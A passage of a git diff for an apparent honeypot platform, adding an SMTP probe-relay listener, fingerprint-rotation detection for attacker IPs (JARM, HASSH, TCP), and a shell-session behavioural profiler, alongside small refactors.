@@ -18,11 +18,8 @@ or IP can't escape into a shell.
 from __future__ import annotations

 import asyncio
-import shlex
 from typing import Any
-
-import base64
-from datetime import datetime, timezone
+from datetime import datetime

 from decnet.logging import get_logger
 from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
    ) -> ActivityResult:
        """Write *content* to *path* inside *decky_name*'s ssh container.

-        Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
-        ARG_MAX-safe write — see commit c17b9e0).  Sets file mode and,
-        when *mtime* is provided, ``touch -d`` to backdate the file so
-        it doesn't all stamp at wall-clock-now (the realism failure
-        this migration is fixing).
+        Delegates to :func:`decnet.decky_io.write_file_to_container`,
+        which carries the ARG_MAX-safe base64-via-stdin trick.  Sets
+        file mode and, when *mtime* is provided, ``touch -d`` to
+        backdate the file (otherwise everything stamps at wall-clock-now
+        — the realism failure this path was originally fixing).
        """
+        from decnet.decky_io import write_file_to_container
+
        container = _container_for(decky_name)
-        b64 = base64.b64encode(content).decode("ascii")
-        # touch -d accepts ISO 8601; we always emit UTC so the
-        # container's local TZ doesn't drift the mtime.
-        if mtime is not None:
-            ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
-            touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
-        else:
-            touch_cmd = f"touch {shlex.quote(path)}"
-        sh_cmd = (
-            f"mkdir -p {shlex.quote(_dirname(path))} && "
-            f"base64 -d > {shlex.quote(path)} && "
-            f"chmod {mode:o} {shlex.quote(path)} && "
-            f"{touch_cmd}"
+        success, error = await write_file_to_container(
+            container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
        )
-        argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
-        rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
-        success = rc == 0
        payload: dict[str, Any] = {
            "dst_decky": decky_name,
            "path": path,
            "bytes": len(content),
-            "rc": rc,
-            "stderr": stderr.strip()[:256] if not success else None,
+            "rc": 0 if success else 1,
+            "stderr": error if not success else None,
        }
        return ActivityResult(success=success, payload=payload)

@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
        )


-def _dirname(path: str) -> str:
-    """Pure-string dirname.  We can't trust ``os.path.dirname`` on the
-    host to share the destination container's separator semantics, but
-    deckies are POSIX so a plain ``rfind('/')`` suffices."""
-    idx = path.rfind("/")
-    if idx <= 0:
-        return "/"
-    return path[:idx]
--- a/decnet/orchestrator/emailgen/scheduler.py
+++ b/decnet/orchestrator/emailgen/scheduler.py
@@ -131,13 +131,13 @@ async def _resolve_personas(
        topology = await repo.get_topology(topology_id)
        if not topology:
            return [], source
-        return (
-            parse_personas(
-                topology.get("email_personas"),
-                language_default=topology.get("language_default") or "en",
-            ),
-            source,
-        )
+        if isinstance(topology, dict):
+            raw = topology.get("email_personas")
+            lang = topology.get("language_default") or "en"
+        else:
+            raw = topology.email_personas
+            lang = topology.language_default or "en"
+        return parse_personas(raw, language_default=lang), source
    # Fleet / shard / anything else → global pool.
    return global_pool.load(), source

@@ -175,7 +175,7 @@ async def pick(
        )
        return None

-    active = [p for p in personas if in_active_hours(p, now_dt.hour)]
+    active = [p for p in personas if in_active_hours(p, now_dt)]
    if len(active) < 2:
        logger.debug(
            "emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
--- a/decnet/orchestrator/scheduler.py
+++ b/decnet/orchestrator/scheduler.py
@@ -311,17 +311,22 @@ async def _resolve_personas(
    return enriched


-def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
+def _topology_personas(topology) -> list[EmailPersona]:
    if not topology:
        return []
-    raw = topology.get("email_personas")
+    if isinstance(topology, dict):
+        raw = topology.get("email_personas")
+        lang = topology.get("language_default") or "en"
+    else:
+        raw = topology.email_personas
+        lang = topology.language_default or "en"
    if raw is None:
        return []
    if isinstance(raw, list):
-        return parse_personas(raw, language_default=topology.get("language_default") or "en")
+        return parse_personas(raw, language_default=lang)
    if isinstance(raw, str):
        try:
-            return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
+            return parse_personas(json.loads(raw), language_default=lang)
        except json.JSONDecodeError:
            return []
    return []
--- a/decnet/orchestrator/worker.py
+++ b/decnet/orchestrator/worker.py
@@ -25,6 +25,7 @@ import secrets
 from datetime import datetime, timezone
 from typing import Any, Optional

+from decnet.bus import topics as _topics
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import (
    publish_safely,
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
 from decnet.logging import get_logger
 from decnet.orchestrator import events, scheduler
 from decnet.orchestrator.drivers import get_driver_for
+from decnet.orchestrator.drivers.smtp_relay import forward_probe
 from decnet.orchestrator.emailgen import (
    events as email_events,
    scheduler as email_scheduler,
@@ -127,6 +129,7 @@ async def orchestrator_worker(
    # operator's intent rather than the baked-in defaults. A failure
    # here logs and falls through; the planner already holds defaults.
    await _refresh_realism_config(repo)
+    await _refresh_llm_config(repo)

    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(
@@ -138,6 +141,9 @@ async def orchestrator_worker(
    control_task = asyncio.create_task(
        run_control_listener(bus, "orchestrator", shutdown),
    )
+    probe_task = asyncio.create_task(
+        _run_smtp_probe_listener(repo, shutdown),
+    )
    tick_n = 0
    try:
        while not shutdown.is_set():
@@ -156,8 +162,9 @@ async def orchestrator_worker(
                await _periodic_prune(repo)
            if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
                await _refresh_realism_config(repo)
+                await _refresh_llm_config(repo)
    finally:
-        for t in (heartbeat_task, control_task):
+        for t in (heartbeat_task, control_task, probe_task):
            t.cancel()
            with contextlib.suppress(Exception, asyncio.CancelledError):
                await t
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
        logger.warning("realism config refresh: rejected payload: %s", exc)


+async def _refresh_llm_config(repo: BaseRepository) -> None:
+    """Pull operator-tuned LLM config from realism_config into the backend cache."""
+    from decnet.realism.llm.config import apply, load_from_db
+    try:
+        # Best-effort refresh: a failed load or apply is logged, never raised.
+        cfg = await load_from_db(repo)
+        if cfg is not None:
+            apply(cfg)
+    except Exception as exc:  # noqa: BLE001
+        logger.warning("llm config refresh: load/apply failed: %s", exc)
+
+
 def _roll_action_kind(rng: secrets.SystemRandom) -> str:
    total = sum(w for _, w in _ACTION_WEIGHTS)
    target = rng.randint(1, total)
@@ -303,7 +322,7 @@ async def _pick_action(
            )
        elif kind == "email":
            try:
-                action = await email_scheduler.pick(repo, rand=rng)
+                action = await email_scheduler.pick(repo, rand=rng)  # type: ignore[assignment]
            except Exception as exc:  # noqa: BLE001
                logger.debug("orchestrator: email pick failed: %s", exc)
                action = None
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
    await repo.update_synthetic_file(action.synthetic_file_uuid, patch)


+async def _run_smtp_probe_listener(
+    repo: BaseRepository,
+    shutdown: asyncio.Event,
+) -> None:
+    """Subscribe to smtp.probe.pending and forward probe emails upstream.
+
+    Long-lived subtask alongside the tick loop: each event's payload goes to
+    ``_handle_probe_pending``.  Handler and bus errors are logged, not raised.
+    """
+    bus = None  # bound before the try so cleanup is safe if get_bus() raises
+    try:
+        bus = get_bus(client_name="orchestrator-probe")
+        await bus.connect()
+        sub = bus.subscribe(_topics.smtp("probe.pending"))
+        async with sub:
+            async for event in sub:
+                if shutdown.is_set():
+                    break
+                try:
+                    await _handle_probe_pending(repo, event.payload)
+                except Exception as exc:  # noqa: BLE001
+                    logger.warning("smtp probe listener: handle error: %s", exc)
+    except asyncio.CancelledError:
+        raise
+    except Exception as exc:  # noqa: BLE001
+        logger.warning("smtp probe listener: bus unavailable: %s", exc)
+    finally:
+        if bus is not None:
+            with contextlib.suppress(Exception):
+                await bus.close()
+
+
+async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
+    """Forward one smtp.probe.pending event upstream and record a probe_relay bounty.
+
+    Returns without action when decky/attacker_ip/stored_as is missing, the decky
+    is unknown, no ``upstream_host`` is configured, or ``probe_limit`` is reached.
+    """
+    decky_name  = (payload.get("decky") or "").strip()
+    attacker_ip = (payload.get("attacker_ip") or "").strip()
+    stored_as   = (payload.get("stored_as") or "").strip()
+    mail_from   = (payload.get("mail_from") or "").strip()
+    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
+    if not (decky_name and attacker_ip and stored_as):
+        return
+
+    decky_row = await repo.get_fleet_decky_by_name(decky_name)
+    if not decky_row:
+        return
+    # ``or {}`` at each level: a key stored as null must not break the chain.
+    decky_cfg = decky_row.get("decky_config") or {}
+    svc_cfg = (decky_cfg.get("service_config") or {}).get("smtp_relay") or {}
+    if not (svc_cfg.get("upstream_host") or "").strip():
+        return
+
+    probe_limit = int(svc_cfg.get("probe_limit") or 1)
+    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
+    if already_sent >= probe_limit:
+        return
+    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
+    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
+    loop = asyncio.get_running_loop()  # forward_probe blocks, so run it off-loop
+    ok, reason = await loop.run_in_executor(
+        None,
+        lambda: forward_probe(
+            svc_cfg=svc_cfg,
+            stored_as=stored_as,
+            decky_name=decky_name,
+            mail_from=mail_from,
+            rcpt_to=rcpt_to,
+            artifacts_root=artifacts_root,
+        ),
+    )
+
+    await repo.add_bounty({
+        "decky": decky_name,
+        "service": "smtp_relay",
+        "attacker_ip": attacker_ip,
+        "bounty_type": "probe_relay",
+        "payload": {
+            "stored_as": stored_as,
+            "forwarded": ok,
+            **({"fwd_error": reason} if not ok else {}),
+        },
+    })
+    if ok:
+        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
+    else:
+        logger.warning(
+            "smtp probe forward failed decky=%s ip=%s error=%s",
+            decky_name, attacker_ip, reason,
+        )
+
+
 async def _record_synthetic_file(repo, action) -> None:
    """Persist (or patch) a synthetic_files row after a FileAction plant.

--- a/decnet/prober/tcpfp.py
+++ b/decnet/prober/tcpfp.py
@@ -48,7 +48,7 @@ def _send_syn(
    Craft a TCP SYN with common options and send it. Returns the
    SYN-ACK response packet or None on timeout/failure.
    """
-    from scapy.all import IP, TCP, conf, sr1
+    from scapy.all import IP, TCP, conf, sr1  # type: ignore[attr-defined]

    # Suppress scapy's noisy output
    conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
        return None

    # Verify it's a SYN-ACK (flags == 0x12)
-    from scapy.all import TCP as TCPLayer
+    from scapy.all import TCP as TCPLayer  # type: ignore[attr-defined]
    if not resp.haslayer(TCPLayer):
        return None
    if resp[TCPLayer].flags != 0x12:  # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
 ) -> None:
    """Send RST to clean up the half-open connection."""
    try:
-        from scapy.all import IP, TCP, send
+        from scapy.all import IP, TCP, send  # type: ignore[attr-defined]
        rst = (
            IP(dst=host)
            / TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
    """
    Extract fingerprint fields from a scapy SYN-ACK response packet.
    """
-    from scapy.all import IP, TCP
+    from scapy.all import IP, TCP  # type: ignore[attr-defined]

    ip_layer = resp[IP]
    tcp_layer = resp[TCP]
--- a/decnet/prober/worker.py
+++ b/decnet/prober/worker.py
@@ -27,6 +27,9 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Callable

+from sqlalchemy.engine import Engine
+from sqlmodel import Session
+
 from decnet.bus import topics as _topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
    run_control_listener,
    run_health_heartbeat,
 )
+from decnet.correlation.fingerprint_rotation import (
+    ProbeType,
+    record_fingerprint,
+)
 from decnet.logging import get_logger
 from decnet.prober.hassh import hassh_server
 from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced

 logger = get_logger("prober")

+
+def _build_sync_engine() -> Engine:
+    """Return the synchronous SQLite engine backing rotation-detection state.
+
+    Rotation detection is a sync hook on a sync probe path, so the
+    prober uses this engine directly instead of going through the async
+    repository layer.  The database file is ``DECNET_DB_PATH`` when that
+    environment variable is set, otherwise ``decnet.db`` under the
+    project root — intended to match the defaulting used by
+    ``decnet.web.db.sqlite.repository.SQLiteRepository``.
+    """
+    import os
+
+    from decnet.config import _ROOT
+    from decnet.web.db.sqlite.database import get_sync_engine
+
+    fallback_path = str(_ROOT / "decnet.db")
+    return get_sync_engine(os.environ.get("DECNET_DB_PATH", fallback_path))
+
 # ─── Default ports per probe type ───────────────────────────────────────────

 # JARM: common C2 callback / TLS server ports
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:

 ProbePublishFn = Callable[[str, dict[str, Any]], None]

+# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
+# performs the rotation-detection upsert + derived-event emission for the
+# DEBT-032 substrate-fingerprint flow.  Optional; when None the prober
+# behaves exactly as before (raw fingerprint emit only, no rotation
+# detection).  Construction lives at worker startup so phase functions
+# don't have to know about the DB engine.
+RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
+

@_traced("prober.probe_cycle")
 def _probe_cycle(
@@ -245,6 +275,7 @@ def _probe_cycle(
    json_path: Path,
    timeout: float = 5.0,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """
    Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -263,13 +294,13 @@ def _probe_cycle(
        ip_probed = probed.setdefault(ip, {})

        # Phase 1: JARM (TLS fingerprinting)
-        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
+        _jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)

        # Phase 2: HASSHServer (SSH fingerprinting)
-        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
+        _hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)

        # Phase 3: TCP/IP stack fingerprinting
-        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
+        _tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)


@_traced("prober.jarm_phase")
@@ -281,6 +312,7 @@ def _jarm_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """JARM-fingerprint an IP on the given TLS ports."""
    done = ip_probed.setdefault("jarm", set())
@@ -301,6 +333,8 @@ def _jarm_phase(
                msg=f"JARM {ip}:{port} = {h}",
            )
            logger.info("prober: JARM %s:%d = %s", ip, port, h)
+            if record_rotation is not None:
+                record_rotation(ip, port, "jarm", h)
            if publish_fn is not None:
                publish_fn(
                    "jarm",
@@ -387,6 +421,7 @@ def _hassh_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """HASSHServer-fingerprint an IP on the given SSH ports."""
    done = ip_probed.setdefault("hassh", set())
@@ -412,6 +447,8 @@ def _hassh_phase(
                msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
            )
            logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
+            if record_rotation is not None:
+                record_rotation(ip, port, "hassh", result["hassh_server"])
            if publish_fn is not None:
                publish_fn(
                    "hassh",
@@ -445,6 +482,7 @@ def _tcpfp_phase(
    json_path: Path,
    timeout: float,
    publish_fn: ProbePublishFn | None = None,
+    record_rotation: RotationRecorderFn | None = None,
 ) -> None:
    """TCP/IP stack fingerprint an IP on the given ports."""
    done = ip_probed.setdefault("tcpfp", set())
@@ -478,6 +516,8 @@ def _tcpfp_phase(
                msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
            )
            logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
+            if record_rotation is not None:
+                record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
            if publish_fn is not None:
                publish_fn(
                    "tcpfp",
@@ -586,6 +626,61 @@ async def prober_worker(
            event_type,
        )

+    # Substrate-rotation detection (DEBT-032) — open a sync engine for
+    # the prober's lifetime; recorder closes a session per call so we
+    # never hold a connection across phase boundaries.  Failure to
+    # connect is non-fatal: probes continue, rotation detection is
+    # silently disabled.
+    rotation_engine: Engine | None = None
+    record_rotation: RotationRecorderFn | None = None
+    try:
+        rotation_engine = _build_sync_engine()
+    except Exception as exc:  # noqa: BLE001
+        logger.warning(
+            "prober: rotation-detection DB unavailable, "
+            "running with rotation detection disabled: %s", exc,
+        )
+
+    if rotation_engine is not None:
+        def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
+            """Publish a rotation event on the fingerprint-rotated attacker topic.
+
+            ``payload`` and ``event_type`` are handed to ``raw_publish``
+            unchanged; only the topic is fixed here.
+            """
+            raw_publish(
+                _topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
+                payload,
+                event_type,
+            )
+
+        def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
+            """Write a ``fingerprint_rotated`` event via ``_write_event``.
+
+            ``payload`` must carry ``attacker_ip``, ``port``,
+            ``probe_type``, ``new_hash`` and ``rotation_count`` (indexed
+            directly, so a missing key raises ``KeyError``); ``old_hash``
+            is optional.  ``event_type`` is accepted for signature
+            compatibility but not used here.
+            """
+            _write_event(
+                log_path, json_path,
+                "fingerprint_rotated",
+                target_ip=payload["attacker_ip"],
+                target_port=str(payload["port"]),
+                probe_type=payload["probe_type"],
+                # A missing/None old hash is written as an empty string.
+                old_hash=payload.get("old_hash") or "",
+                new_hash=payload["new_hash"],
+                rotation_count=str(payload["rotation_count"]),
+                # NOTE(review): unlike the old_hash field above, the message
+                # interpolates a missing old hash as the text "None".
+                msg=(
+                    f"FP rotation {payload['attacker_ip']}:{payload['port']} "
+                    f"{payload['probe_type']} {payload.get('old_hash')} → "
+                    f"{payload['new_hash']}"
+                ),
+            )
+
+        def record_rotation(
+            ip: str, port: int, probe_type: ProbeType, new_hash: str,
+        ) -> None:
+            """Record one fingerprint observation for rotation detection.
+
+            Opens a short-lived ``Session`` on ``rotation_engine`` and
+            delegates to ``record_fingerprint`` with the current UTC time
+            and the publish / syslog callbacks defined alongside.
+
+            Rotation detection is best-effort: the engine connects lazily,
+            so an unreachable or locked database surfaces here rather than
+            at engine construction.  Any failure is logged and suppressed
+            so it cannot abort the probe phase that called us.
+            """
+            try:
+                with Session(rotation_engine) as session:
+                    record_fingerprint(
+                        session,
+                        attacker_ip=ip,
+                        port=port,
+                        probe_type=probe_type,
+                        new_hash=new_hash,
+                        ts=datetime.now(timezone.utc),
+                        publish_fn=_publish_rotation,
+                        syslog_fn=_syslog_rotation,
+                    )
+            except Exception as exc:  # noqa: BLE001
+                logger.warning(
+                    "prober: rotation record failed ip=%s port=%s probe=%s: %s",
+                    ip, port, probe_type, exc,
+                )
+
    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
    control_task = asyncio.create_task(
@@ -612,6 +707,7 @@ async def prober_worker(
                    jarm_ports, hassh_ports, tcp_ports,
                    log_path, json_path, timeout,
                    _publish_attacker,
+                    record_rotation,
                )

            try:
@@ -626,3 +722,6 @@ async def prober_worker(
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
+        if rotation_engine is not None:
+            with contextlib.suppress(Exception):
+                rotation_engine.dispose()
--- a/decnet/profiler/behave_shell/init.py
+++ b/decnet/profiler/behave_shell/init.py
@@ -0,0 +1,25 @@
+"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
+
+Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
+library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
+emission, and persistence. The engine just turns one PTY session into
+``Iterable[Observation]``.
+
+BEHAVE is the spec; DECNET is the engine.
+"""
+from __future__ import annotations
+
+from decnet.profiler.behave_shell.extract import (
+    DEFAULT_SOURCE,
+    build_context,
+    extract_session,
+)
+
+# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
+# emit; calibration grid honest). The ``-pre`` suffix stays until
+# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
+# table writes + AttackerDetail panel; only then does H.5 proper drop the
+# suffix and tag v0.
+__version__ = "0.1.0-pre"
+
+__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
--- a/decnet/profiler/behave_shell/_ctx.py
+++ b/decnet/profiler/behave_shell/_ctx.py
@@ -0,0 +1,573 @@
+"""SessionContext: precomputed bundle every feature function reads from.
+
+A naïve engine re-walks the event stream once per primitive. We don't
+do that — one walk over the events builds this context, every feature
+reads from it. Adding a new feature is O(1) cost on the parse side.
+
+Step 1 fills ``iats`` (inter-key intervals between input events) and
+``paste_bursts`` (contiguous runs of paste-class events). Step 4
+fills ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
+"""
+from __future__ import annotations
+
+import math
+from dataclasses import dataclass, field
+from typing import Iterable, Mapping
+
+from decnet.profiler.behave_shell._intent import (
+    LEXEME_MAX_LEN,
+    NEGATIVE_LEXEMES,
+    OBSCENITY_LEXEMES,
+    POSITIVE_LEXEMES,
+)
+from decnet.profiler.behave_shell._parse import (
+    AsciinemaEvent,
+    Command,
+    PasteBurst,
+    PromptLine,
+    detect_error_in_output,
+    extract_prompt_lines,
+    hash_token,
+    strip_ansi,
+)
+from decnet.profiler.behave_shell._thresholds import (
+    IKI_THINK_MAX_S,
+    LAYOUT_BIGRAM_TOP_N,
+    PASTE_BURST_MAX_IAT_S,
+    PASTE_MIN_CHARS_PER_EVENT,
+    PROMPT_LINE_MAX_CHARS,
+    SHORTCUT_CTRL_BYTES,
+)
+
+
+@dataclass(frozen=True, slots=True)
+class _LexCounters:
+    """Lexical counters from the typed-text walk (G.0).
+
+    Internal to the ctx-builder; returned by
+    :func:`_typed_char_histograms` and flattened onto SessionContext
+    fields in :func:`build_session_context`. Every counter defaults to
+    zero.
+    """
+    # Typed words whose longest matching suffix is in OBSCENITY_LEXEMES.
+    obscenity_hits: int = 0
+    # Typed words whose longest matching suffix is in POSITIVE_LEXEMES.
+    positive_lex_hits: int = 0
+    # Typed words whose longest matching suffix is in NEGATIVE_LEXEMES.
+    negative_lex_hits: int = 0
+    # Longest run of consecutive ASCII uppercase characters typed.
+    caps_run_max: int = 0
+    # Longest run of consecutive "!" characters typed.
+    bang_run_max: int = 0
+
+
+@dataclass(frozen=True, slots=True)
+class SessionContext:
+    """Immutable bundle of per-session derivations read by feature functions.
+
+    Assembled by :func:`build_session_context`. Fields are grouped by
+    the extraction step that introduced them; every derived field has an
+    empty / zero default.
+    """
+    # Identity and provenance, passed through from the caller.
+    # ``evidence_ref`` is ``"session:<sid>"`` when the caller gives none.
+    sid: str
+    source: str
+    evidence_ref: str
+    # Timestamp of the first event, the largest timestamp seen, and their
+    # non-negative difference (all 0.0 for an empty event stream).
+    t_start: float
+    t_end: float
+    duration_s: float
+
+    # Events partitioned by kind: ``"i"`` (input) and ``"o"`` (output).
+    input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
+    output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
+
+    # Step 1 derivations
+    # ``iats``: gaps between consecutive input events, clamped at 0.0.
+    iats: tuple[float, ...] = field(default_factory=tuple)
+    paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
+    # Number of individual paste-class input events (not bursts).
+    paste_event_count: int = 0
+
+    # Step 4 derivations — command segmentation
+    # ``inter_cmd_iats`` and ``output_per_cmd`` hold one entry per
+    # adjacent pair of commands, i.e. ``len(commands) - 1`` entries.
+    commands: tuple[Command, ...] = field(default_factory=tuple)
+    inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
+    output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
+
+    # Step B.1 derivations — typing bursts (IATs split at think-pauses)
+    typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
+
+    # Step B.3 derivations — error-correction signals
+    backspace_count: int = 0
+    backspace_iats: tuple[float, ...] = field(default_factory=tuple)
+    kill_line_count: int = 0
+
+    # Step B.4 derivations — per-command intra-typing IATs
+    # (one inner tuple per entry in ``commands``).
+    intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
+
+    # Step F.0 derivations — PS1 prompt lines detected in the output stream
+    prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
+
+    # Step F.4 derivations — typed-only character histograms for keyboard
+    # layout fingerprinting (PII boundary lifted by ANTI for Phase F).
+    # Keys are lower-cased ASCII letters / letter pairs; the bigram map is
+    # truncated to the LAYOUT_BIGRAM_TOP_N most frequent entries.
+    typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
+    typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
+    typed_letter_count: int = 0
+
+    # Step G.0 derivations — lexical counters from the same single-pass
+    # typed-text walk. No raw text retained; only fixed-vocabulary
+    # membership counts and run-lengths. Drives valence (G.5), arousal
+    # (G.6), and frustration_venting (G.8).
+    obscenity_hits: int = 0
+    positive_lex_hits: int = 0
+    negative_lex_hits: int = 0
+    caps_run_max: int = 0
+    bang_run_max: int = 0
+
+
+def _detect_paste_bursts(
+    inputs: list[AsciinemaEvent],
+) -> tuple[tuple[PasteBurst, ...], int]:
+    """Collapse runs of paste-class input events into ``PasteBurst`` records.
+
+    An event is paste-class when ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
+    A paste-class event joins the currently open burst unless the gap to
+    the previous input event exceeds ``PASTE_BURST_MAX_IAT_S``, in which
+    case the open burst is emitted and a new one starts. Any event that
+    is not paste-class ends the open burst.
+
+    Returns ``(bursts, paste_event_count)`` where the count is the number
+    of individual paste-class events (what the ``BEHAVE`` prototype calls
+    ``paste_events``).
+    """
+    found: list[PasteBurst] = []
+    paste_events = 0
+    # Keyword arguments of the burst being accumulated; None when closed.
+    open_burst: dict | None = None
+    prev_ts: float | None = None
+
+    for ts, _kind, payload in inputs:
+        if len(payload) >= PASTE_MIN_CHARS_PER_EVENT:
+            paste_events += 1
+            if (
+                open_burst is not None
+                and prev_ts is not None
+                and (ts - prev_ts) > PASTE_BURST_MAX_IAT_S
+            ):
+                # Gap too long: the running burst ends before this event.
+                found.append(PasteBurst(**open_burst))
+                open_burst = None
+            if open_burst is None:
+                open_burst = {
+                    "start_ts": ts,
+                    "end_ts": ts,
+                    "char_count": 0,
+                    "event_count": 0,
+                }
+            open_burst["end_ts"] = ts
+            open_burst["char_count"] += len(payload)
+            open_burst["event_count"] += 1
+        elif open_burst is not None:
+            # A typed (non-paste) event terminates the burst.
+            found.append(PasteBurst(**open_burst))
+            open_burst = None
+        prev_ts = ts
+
+    if open_burst is not None:
+        found.append(PasteBurst(**open_burst))
+    return tuple(found), paste_events
+
+
+# DEL (0x7f) and BS (0x08): both count as a backspace keystroke.
+_BACKSPACE_CHARS = ("\x7f", "\x08")
+# 0x15 (Ctrl-U) and 0x17 (Ctrl-W): counted as kill-line keystrokes.
+_KILL_LINE_CHARS = ("\x15", "\x17")
+
+
+def _scan_correction_signals(
+    inputs: list[AsciinemaEvent],
+) -> tuple[int, tuple[float, ...], int]:
+    """Count correction keystrokes across every character of ``inputs``.
+
+    Returns ``(backspace_count, backspace_iats, kill_line_count)``. Each
+    backspace contributes one IAT: the non-negative gap between its
+    event timestamp and the timestamp of the most recent character that
+    was *not* a backspace (none is recorded before such a character has
+    been seen).
+
+    PII discipline: only counts and timings are returned; no character
+    data leaves this function.
+    """
+    n_backspace = 0
+    n_kill = 0
+    gaps: list[float] = []
+    anchor_ts: float | None = None
+    for ts, _kind, payload in inputs:
+        for ch in payload:
+            if ch in _BACKSPACE_CHARS:
+                n_backspace += 1
+                if anchor_ts is not None:
+                    gaps.append(max(0.0, ts - anchor_ts))
+                continue
+            if ch in _KILL_LINE_CHARS:
+                n_kill += 1
+            # Kill-line and ordinary characters both move the anchor.
+            anchor_ts = ts
+    return n_backspace, tuple(gaps), n_kill
+
+
+def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
+    """Cut ``iats`` into typing bursts at every gap above ``IKI_THINK_MAX_S``.
+
+    The think-pause gap itself belongs to no burst. Bursts with fewer
+    than 3 IATs are discarded as too short for a stable CV. Mirrors the
+    BEHAVE prototype's ``_split_into_bursts``.
+    """
+    runs: list[list[float]] = []
+    current: list[float] = []
+    for gap in iats:
+        if gap > IKI_THINK_MAX_S:
+            # Think-pause: close the running burst (if it has content).
+            if current:
+                runs.append(current)
+                current = []
+            continue
+        current.append(gap)
+    runs.append(current)
+    return tuple(tuple(run) for run in runs if len(run) >= 3)
+
+
+def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
+    """Split the typed character stream into commands at ``\\r`` / ``\\n``.
+
+    For each command only a hash of its first whitespace-delimited
+    token is kept, together with three counters used by the Phase C
+    ``motor.shell_mastery.*`` primitives:
+
+    * ``tab_count``      — ``\\t`` (0x09) characters
+    * ``shortcut_count`` — characters found in
+      :data:`SHORTCUT_CTRL_BYTES`
+    * ``pipe_count``     — ``|`` characters (typed or pasted alike)
+
+    ``start_ts`` is the timestamp of the event carrying the command's
+    first buffered character; ``end_ts`` is that of the terminator. A
+    terminator with nothing buffered produces no command, and the
